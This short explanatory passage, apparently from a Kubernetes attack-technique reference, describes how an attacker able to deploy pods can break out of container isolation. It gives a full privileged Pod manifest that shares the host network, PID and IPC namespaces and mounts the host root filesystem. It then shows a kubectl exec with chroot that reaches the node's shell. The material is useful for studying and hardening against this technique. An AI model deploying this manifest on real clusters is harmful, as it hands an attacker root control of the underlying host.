Containers normally use namespacing of resources on the host system to gain somewhat of an isolation. This is for example the case for the process namespace and the network namespace. If an attacker can deploy a container (See “New container” for more details.) without leveraging resource namespacing the container can use resources of the host system.
An attacker that can deploy a container without restrictions can use a Pod like the following to bypass basically any kind of namespacing and have the newly created container behave as if it is the underlying host system (which from a tecnical perspective it is up to a certain point at this point).
apiVersion: v1
kind: Pod
metadata:
name: noderootpod
labels:
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: noderootpod
image: busybox
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
After deploying the Pod we can verify that we can actually access it and it provides us access to the underlying host.
$ kubectl exec -it noderootpod -- chroot /host
/ # hostname
cluster-node-1